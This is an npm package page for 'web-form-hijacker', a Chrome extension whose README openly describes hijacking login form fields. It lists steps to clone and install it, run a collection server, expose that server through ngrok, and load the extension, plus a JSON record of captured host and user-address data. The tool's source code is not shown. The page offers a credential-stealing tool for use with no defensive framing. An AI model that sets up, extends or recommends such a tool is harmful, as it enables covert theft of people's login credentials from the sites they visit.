1.1.2 • Published 6 years ago

web-form-hijacker v1.1.2

Weekly downloads
1
License
MIT
Repository
-
Last release
6 years ago

web-form-hijacker

form hijacking chrome extension

DownLoad

NPM VersionTotal downloadsLatest release
Alt textAlt textAlt text

Install

$ git clone https://github.com/u4bi-git/web-form-hijacker.git hi
$ cd hi
$ npm install

Usage

$ npm run server

Download ngrok (Because of SSL connection)

$ ./ngrok http 7777

Load unpacked extension (chrome://extensions)

Alt text

Login form field hijacking

Alt text

JSON DB

{
    "id"        : 1,
    "host"      : "www.example.com",
    "user_addr" : "0.0.0.0",
    ...etc
}

Alt text

Extension Icon

transparent color for the Icon

Alt text

License

MIT

1.1.2

6 years ago

1.1.1

6 years ago

1.1.0

6 years ago

1.0.6

6 years ago

1.0.5

6 years ago

1.0.4

6 years ago

1.0.3

6 years ago

1.0.2

6 years ago

1.0.1

6 years ago

1.0.0

6 years ago